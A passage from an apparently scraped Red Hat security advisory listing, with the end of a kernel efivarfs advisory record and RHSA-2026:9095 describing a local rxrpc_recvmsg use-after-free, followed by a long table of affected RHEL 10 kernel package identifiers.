"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel: Information disclosure in efivarfs via incorrect error propagation"
}
]
}
RHSA-2026:9095
Vulnerability from csaf_redhat - Published: 2026-04-20 18:30 - Updated: 2026-05-06 20:36A flaw was found in the Linux kernel. A local unprivileged process can exploit an unsafe requeue path in the `rxrpc_recvmsg` function by using `AF_RXRPC` sockets with `MSG_DONTWAIT` and `MSG_PEEK` flags. This improper handling of the receive message queue can lead to memory corruption, such as Use-After-Frees (UAFs) or reference count underruns. The most likely outcome is a kernel crash or memory safety warning, resulting in a denial of service. There is also a conservative possibility of broader impact if the memory corruption is exploitable.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
